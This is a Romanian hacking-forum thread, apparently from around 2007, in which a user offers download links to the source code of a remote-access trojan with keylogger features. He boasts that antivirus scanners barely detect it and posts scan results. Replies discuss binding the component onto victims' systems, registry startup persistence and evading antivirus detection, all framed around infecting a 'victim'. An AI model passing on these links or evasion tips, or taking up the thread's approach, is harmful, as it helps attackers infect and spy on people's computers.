Nytro Posted December 30, 2007 Report Posted December 30, 2007 Un trojan , care foloseste toate functiile NyTrojan.OCXDeci folositi ocx : obtineti un trojan 97% UD , decat McAfee il gaseste , foarte usor de folosit functiile OCXului , faceti foarte usor Keylogger si multe altele . Sursa ESTE EXPLICATA , cred ca veti intelege toti Grafica e varza dar e nedetectabil : decat McAfee l-a gasit ca VB-BackDoor.a.gen . Download Source Code ( e si OCX acolo ) :http://rapidshare.com/files/80026164/NyTrojan_RAT_Source_Code.rarhttp://www.speedyshare.com/611620807.htmlhttp://www2.eushare.com/download.php?file=NyTrojan%20RAT%20Source%20Code.rarhttp://www.netdrive.ws/40906.htmlScreenshot :Server Scan :File Server.exe received on 12.30.2007 10:13:07 (CET)Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPEDResult: 1/32 (3.13%)Client Scan :File Client.exe received on 12.30.2007 10:17:04 (CET)Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPEDResult: 1/32 (3.13%)OCX Scan :File NyTrOjan.ocx received on 12.30.2007 10:20:40 (CET)Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPEDResult: 0/32 (0%)Mai multe depre OCX :http://rstcenter.com/forum/nytrojan-ocx-t9594.rst Quote
xZu Posted December 30, 2007 Report Posted December 30, 2007 Da pai e foarte usor sa faci un trojan/keylogger cu acel NyTrojan.OCX Quote
Nytro Posted December 30, 2007 Author Report Posted December 30, 2007 E foarte usor si il faci si nedetectabil , oricum McAfee cred ca gaseste toti trojanii dupa codul de conectare ... Quote
kafka Posted December 30, 2007 Report Posted December 30, 2007 marfa...nytro amice...daca victima nu are ocx-u tau trojanul functioneaza?sau nu,,,?ai facut treaba buna...bvo Quote
tw8 Posted December 30, 2007 Report Posted December 30, 2007 OCX ScanPreety smart ... ai scanat un OCX ?daca victima nu are ocx-u tau trojanul functioneaza?sau nu,,,?Tu ce crezi ? Normal ca nu.Cat despre asta, e cam timp pierdut. O sa imi sustin afirmatia maine - acum mi-e cam somn -, prin prezentarea unui DLL interesant . Quote
Guest Nemessis Posted December 30, 2007 Report Posted December 30, 2007 tw8, ocx-ul se poate binda si inregistra in sistem foarte usor. Atata timp cat functioneaza nu vad de ce ar fi timp pierdut degeaba. Quote
tw8 Posted December 30, 2007 Report Posted December 30, 2007 tw8, ocx-ul se poate binda si inregistra in sistem foarte usor.Stiu .Atata timp cat functioneaza nu vad de ce ar fi timp pierdut degeaba.AutoIT a scos o chestie destul de interesanta numita AutoITX. Are o gramada de functii interesante, concepute pentru automatizari si care pot fi folosite cu usurinta pentru a realiza in orice limbaj de programare lucruri cel putin dragute.Numeroasele optiuni de lucru cu ferestrele il fac ideal pentru optiuni de fun pentru trojani.In plus, are si un help solid si e foarte usor de implementat in limbajele .NET .Cam atat cu vorba ca adorm pe tastatura.Link de download pentru curiosi:http://www.autoitscript.com/cgi-bin/countdown.pl?AutoIt/AutoItX.zip Quote
Nytro Posted December 31, 2007 Author Report Posted December 31, 2007 Incerc sa copiez ocx in Form_initialize din fisier de resurse sa vad daca merge ... Si sunt sigur ca nu am muncit degeaba , 97 % nedetectabil ... de fapt nu vad de ce ar fi detectabil ... in cod nu gasesti decat NyTrojan1.OpenCDRom , NyTrojan1. ... etc ... deci trojanu propriu zis nu va fi detectabil , nu are cum , insa ocx , cred ca va fi detectabil ... si mai am o idee , pentru a face un trojan nedetectabil , dar o pastrez , pentru cand devine ocx detectabil... Quote
tw8 Posted December 31, 2007 Report Posted December 31, 2007 insa ocx , cred ca va fi detectabil ... si mai am o idee , pentru a face un trojan nedetectabil , dar o pastrez , pentru cand devine ocx detectabil...Tu auzi ce prostii debitezi ?OCX detectabil ... yeah 8). Quote
Nytro Posted December 31, 2007 Author Report Posted December 31, 2007 Pai , la nytro.ocx , versiunea mai veche , a scanat-o cineva si a gait-o AVG ... BackDoor Win32 ... nu mai stiu ... si o sa se prinda cei de la antivirui de smecheria asta cu ocx-ul ... Quote
vladiii Posted December 31, 2007 Report Posted December 31, 2007 Tu auzi ce prostii debitezi ?OCX detectabil ... yeah 8).De fapt, un OCX poate fi detectat de AV. Pentru ca foloseste formatul PE (la fel ca si executabilele, DLLurile si alte fisiere cu alte extensii [.scr, .sys]). Spre exemplu, un fisier cu extensia .dat nu o sa fie niciodata detectat de AV, pentru ca nu foloseste file formatul de mai sus. Quote
Nytro Posted December 31, 2007 Author Report Posted December 31, 2007 Nu numei PE ... si txt sunt gasite ... De ex. c99-le il aveam txt ... si a fost gasit ca virus ... daca intram pe coolpics ... site ala cu virusul de dadeai massuri pe mess , nu ma lasa kasperky sa intru ... Ar trebui ca antivirusii sa gaseasca si .vbs , .bat ... fiiere care pot face rau ... insa ocx meu , singur nu poate face nici un rau , decat daca un exe , ii foloseste functiile ... Quote
Dark Hacker 3k Posted July 12, 2008 Report Posted July 12, 2008 Da Nytro, dar antivirusii scaneaza comparand cu baza lor de date si cand gasesc ceva similar, sar imediat avertizand ca fisierul este suspicios. Ocx-ul este "descopmpus" la analiza si .. atata timp cat exista vechile coduri, tot va sari, chiar daca includem ceva nou intre timp Eu 1 am facut niste teste si ... partile la care trebuie lucrat sunt intrarile in registrii (startup), in primul rand. Quote